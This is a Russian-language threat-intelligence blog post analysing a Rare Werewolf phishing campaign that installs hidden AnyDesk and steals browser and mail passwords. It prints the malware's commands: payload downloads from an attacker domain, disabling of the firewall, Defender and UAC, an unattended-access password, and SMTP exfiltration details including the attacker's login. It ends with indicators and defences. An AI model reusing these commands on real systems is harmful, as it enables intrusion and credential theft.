Привет, Хабр! Специалисты Angara MTDR зафиксировали новую фишинговую кампанию от группировки Rare Werewolf. На сей раз вредонос спрятан во вложения, которые сопровождает имитация деловой переписки. Она создана по всем правилам социальной инженерии. Основной целью злоумышленников, как и прежде, является первоначальное закрепление в ИТ-инфраструктуре жертвы.

Специалисты Angara MTDR провели исследование новой фишинговой рассылки хакерской группировки Rare Werewolf (Rezet, Librarian Ghouls).

При открытии вложения на компьютер пользователя устанавливается приложение удалённого управления компьютером AnyDesk в скрытом режиме и утилиты для извлечения паролей из браузеров и почты.

Загрузка компонентов атаки осуществляется в несколько этапов, на каждом из которых используются зашифрованные архивы с целью минимизации срабатывания средств защиты.

Kill Chain атаки
Kill Chain атаки

Письмо

Рассылка произведена 1 июля 2026 года в 3 утра по Москве с учётной записи nshan.marayan@bk.ru от имени «Вовченко Алексей».

Пример письма
Пример письма

Письмо включает зашифрованный архив Актуальная редакция Договора поставки N 8530-69 Исх. 755.rar (md5 770b7e91f6daf8b9d069fd3f242edbca). Пароль для архива vovchenko указан в письме.

Архив содержит файлы:

  1. Калькуляция по Договору поставки N 8530-69.xlsx — файл, заполненный нулевыми байтами;

  2. Актуальная редакция Договора поставки N 8530-69 Исх. 755.com — исполняемый файл, несущий основную вредоносную нагрузку.

Для повышения вероятности открытия вложения злоумышленники воспроизвели типичный сценарий рабочей переписки. В теме письма используются префиксы Fwd и Re, из-за чего сообщение выглядит как продолжение уже существующего обсуждения или пересланная коллегами цепочка писем.

Текст письма насыщен привычными для делового общения формулировками: «преамбула», «п. 4.6», «согласованный проект», «договор», «калькуляция». Упоминание конкретного пункта документа создаёт впечатление, что отправитель действительно работал с вложением и вносил в него изменения.

Дополнительно злоумышленники имитируют внутреннюю корпоративную коммуникацию: используют подписи от имени конкретных сотрудников, выдерживают деловой стиль общения и сообщают пароль к архиву. Передача документов в защищённых архивах часто воспринимается как обычная практика обмена конфиденциальной информацией и не вызывает подозрений.

Ещё одним элементом социальной инженерии стало добавление блока о проверке письма антивирусным решением Kaspersky Security Mail Gateway. Такое уведомление должно сформировать у получателя ложное ощущение безопасности и снизить настороженность при открытии вложения.

Алгоритм работы

1. Запуск инсталлятора.

Файл Актуальная редакция Договора поставки N 8530-69 Исх. 755.com (md5 e3128f066524b377d6aa23db52a28c8f) представляет собой инсталляционный пакет, подготовленный при помощи Smart Installer Maker 5.04.

После запуска инсталлятор создаёт каталог %APPDATA%\Windows\ и делает его скрытым и системным:

ATTRIB +S +H %APPDATA%\Windows

В каталоге создаётся и запускается сценарий find.cmd, содержащий основную логику дальнейшего заражения и файлы:

  1. url.txt — адрес для загрузки следующих компонентов атаки;

  2. doc5.doc — документ прикрытия;

  3. any.bat — скрипт для установки пароля на AnyDesk;

  4. find.exe — curl для загрузки следующих этапов.

Кроме этого, в реестр заносятся настройки 4t Tray Minimizer, которые реализуют автозапуск 4t Tray Minimizer с опциями скрытия работы AnyDesk.

После распаковки файлов и генерации find.cmd запускаются следующие скрипты:

  1. %AppData%\Windows\any.bat;

  2. %AppData%\Windows\find.cmd — загрузка и запуск следующих компонентов атаки;

  3. %AppData%\Windows\bat.bat — создаётся find.cmd.

В целях скрытия вредоносной активности открывается файл doc5.doc.

Документ прикрытия
Документ прикрытия

2. Загрузка следующих этапов

find.cmd загружает дополнительные компоненты компьютерной атаки для закрепления, сбора паролей и отправки в адрес злоумышленников.

%AppData%\Windows\find.exe -o %AppData%\Windows\bk.rar %content%/bk.jpg
%AppData%\Windows\find.exe -o %AppData%\Windows\driver.exe %content%/driver.jpg
%AppData%\Windows\find.exe -o %AppData%\Windows\pas.rar %content%/pas.jpg

Удалённый адрес %content% для загрузки извлекается из %APPDATA%\Windows\url.txt. В исследованном образце содержится адрес http://goffice[.]digital.

Под видом изображений с удалённого сервера загружаются архивы и утилиты:

URL

Локальное имя

Назначение

/bk.jpg

bk.rar

Архив с 4t Tray Minimizer

/driver.jpg

driver.exe

WinRAR CLI

/pas.jpg

pas.rar

AnyDesk и инструменты сбора учётных данных

Загрузка производится посредством find.exe, представляющего собой утилиту curl.
Полученный driver.exe используется как архиватор WinRAR командной строки.
Архивы bk.rar, pas.rar распаковываются с использованием пароля limpid2903392.
Из bk.rar извлекается каталог Trays\ с программой 4t Tray Minimizer.
Из pas.rar в директорию %AppData%\Windows извлекаются:

  • AnyDesk.exe — средство удалённого доступа;

  • blat.exe — SMTP-клиент;

  • mlpv.exeMailPassView, извлечение паролей почтовых клиентов;

  • wbpv.exeWebBrowserPassView, извлечение паролей браузеров.

  • bat.bat — скрипт финального этапа цепочки, который собирает пароли, отправляет результаты злоумышленникам и зачищает артефакты.

3. Скрытие иконок

В find.cmd выполняется запуск:

start %APPDATA%\Windows\Trays\Trays.lnk

что инициирует работу 4t Tray Minimizer.

После чего устанавливается AnyDesk:
AnyDesk.exe --install %APPDATA%\Windows\AnyDesk

Примечательно, что Trays.lnk содержит артефакты неоднократного перемещения целевого файла Trays.exe:

  1. Путь C:\Users\volodymyr.kononenko\AppData\Roaming\windows\Trays\Trays.exe.

  2. Путь C:\Intel\Trays\Trays.exe.

Сам файл Trays.lnk ранее находился в одной из директорий пользователя первого уровня (например, Загрузки или Рабочий стол). Для создания ярлыка использовалась операционная система с установленным русским языковым пакетом.

4. Отключение защитных механизмов

После загрузки и извлечения файлов find.cmd отключает Windows Firewall, пытается остановить Microsoft Defender и службу Windows Firewall MpsSvc, а затем удалить её:

netsh advfirewall set allprofiles state off
sc stop WinDefend
net stop MpsSvc
sc stop MpsSvc
sc delete MpsSvc

5. Настройка удаленного доступа

Сценарий any.bat ожидает около двух минут:

ping -n 120 127.0.0.1

после чего автоматически устанавливает пароль для неконтролируемого доступа:

echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access

В результате злоумышленники получают возможность подключаться к системе без участия пользователя.

6. Подготовка системы к постоянного удаленному управлению

bat.bat изменяет параметры электропитания:
powercfg -change -standby-timeout-ac 0
powercfg -change -hibernate-timeout-ac 0
powercfg -h off
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1

Тем самым предотвращается переход компьютера в режим сна или гибернации.

7. Получение сведений об установленном AnyDesk

bat.bat cчитывает идентификатор из num.doc. В данном случае ранее туда записывалось значение 5.

set/pnum=< num.doc

Далее скрипт ждёт около 150 секунд, вероятно, чтобы AnyDesk успел установиться и создать конфигурацию.

ping -n 150 127.0.0.1 >nul

После завершения установки AnyDesk злоумышленникам отправляется файл:

%PROGRAMDATA%\AnyDesk\system.conf

Для отправки используется SMTP-сервер mail.goffice.click с учётными данными out@goffice.click и паролем ZMQofPP8aTsV. Тема письма содержит AnyDesk <COMPUTERNAME>/<num>/<USERNAME>.

8. Сбор и эксфильтрация учётных данных

Из архива pas.rar были извлечены утилиты NirSoft.

WebBrowserPassView сохраняет браузерные пароли в файл password.txt.

MailPassView сохраняет пароли почтовых клиентов в email.txt.

Полученные файлы отправляются злоумышленникам по SMTP посредством blat.exe с теми же реквизитами, что и настройки AnyDesk. Темы писем — Password <COMPUTERNAME>/<num>/<USERNAME> и Email <COMPUTERNAME>/<num>/<USERNAME> соответственно.

9. Ослабление механизмов защиты

Вредоносный сценарий bat.bat предпринимает попытки отключения встроенных средств защиты Windows:

netsh advfirewall set allprofiles state off
sc stop WinDefend
net stop MpsSvc
sc stop MpsSvc
sc delete MpsSvc

Дополнительно создаются правила для TCP-порта 6004:

netsh advfirewall firewall add rule name="1" dir=in action=allow protocol=TCP localport=6004
netsh advfirewall firewall add rule name="2" dir=out action=allow protocol=TCP localport=6004

и отключается UAC:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0

Следует отметить, что выполнение части этих действий требует административных привилегий и не гарантировано на современных версиях Windows.

10. Удаление следов деятельности

После завершения основных действий производится очистка рабочей директории:

find.exe
driver.exe
blat.exe
wbpv.exe
mlpv.exe
pas.rar
bk.rar
password.txt
email.txt
url.txt
AnyDesk.exe
find.cmd
any.bat
bat.bat

Также удаляются файлы в:

del /q /f "C:\Intel\*.exe"

Эта часть скрипта бесполезна в данной атаке и осталась от прошлых вредоносных рассылок Rare Werewolf.

Итоговое назначение кампании

Исследованный образец представляет собой средство первоначального доступа и постэксплуатации, предназначенное для:

  • развёртывания легитимного средства удалённого администрирования AnyDesk;

  • автоматической настройки постоянного удалённого доступа;

  • извлечения сохранённых браузерных и почтовых учётных данных;

  • передачи полученных данных оператору через SMTP-инфраструктуру злоумышленников;

  • ослабления механизмов защиты Windows;

  • удаления большинства артефактов после завершения установки.

Фактически цепочка реализует установку удалённого доступа + кражу учётных данных + последующую зачистку следов присутствия.

Индикаторы компрометации

Значение

Описание

goffice[.]click

Удалённый сервер для отправки результатов

goffice[.]digital

Удалённый сервер для загрузки следующих этапов

e3128f066524b377d6aa23db52a28c8f

md5 Актуальная редакция Договора поставки N 8530-69 Исх. 755.com

770b7e91f6daf8b9d069fd3f242edbca

md5 Актуальная редакция Договора поставки N 8530-69 Исх. 755.rar

%AppData%\Windows

Директория для хранения исполняемых файлов

7425d5a3b3352f87bc33b3bf62a73a9e

bk.rar

bb3af87238abccdd1b9001f96348e756

AnyDesk.exe

2fdeafb457a4ecc1f929834d228469ec

wbpv.exe (WebBrowserPassView)

5995ae2dd85a81b2aba1dcd574c5b8ab

bat.bat

3790f03580650f7018ec27414bf17eb4

mlpv.exe (MailPassView)

34c6dfa28c293b5f21a77f74d94de16b

blat.exe

f23199ddbbe20f887a557311ec1b0904

pas.rar

29086d9247fdf40452563c11b3dca394

driver.exe (WinRAR CLI)

1e02a122fe09272058fc1ef0b1b6265e

find.exe (Curl)

68f8273b3ce5e44ed20ee2943e0de193

any.bat

cce2e2a4ad6ec5cb6926ae09a5a90d67

doc5.doc

3537687b1d430ae0b44424a41866c63d

url.txt

Рекомендации от Angara MTDR

  1. Просканировать все узлы сети на предмет наличия индикаторов компрометации. Несмотря на то, что файлы удаляются после своего использования, оставшиеся следы закреплений могут выступать в качестве маркеров успешной атаки. Все доменные имена и IP-адреса также должны быть заблокированы.

  2. Обеспечить максимальную зону покрытия антивирусным программным обеспечением, а также регулярно проверять наличие и проводить установку обновлений как самих клиентов, так и баз сигнатур.

  3. Контролировать и по возможности ограничивать использование программ удалённого управления, включая AnyDesk, в корпоративной сети. Их эксплуатация позволяет злоумышленникам маскировать нелегитимные действия в атакуемой инфраструктуре под действия администратора, который выполняет функциональные обязанности.

  4. Проверить почтовый сервер на наличие аналогичных писем путём поиска по заданной теме, отправителю или вложению. При обнаружении таких писем их необходимо удалить, чтобы исключить открытие вредоносного содержимого другими пользователями.

  5. Проводить регулярные тренинги сотрудников, направленные на повышение осведомлённости сотрудников в вопросах информационной безопасности, в том числе выявления признаков фишинга.

  6. Не хранить учётные данные в браузере (отключить сохранение паролей можно посредством соответствующей GPO) или использовать криптостойкие мастер-пароли для уменьшения вероятности их компрометации.

  7. Удостовериться, что в мессенджерах на используемом устройстве установлены как облачные, так и локальные пароли.

Если вы обнаружили признаки схожей активности в своей инфраструктуре, образцы подозрительных файлов или столкнулись с другим инцидентом, команда Angara MTDR готова подключиться к расследованию, провести анализ артефактов и оказать необходимую экспертную поддержку. Связаться с нами: response@angarasecurity.ru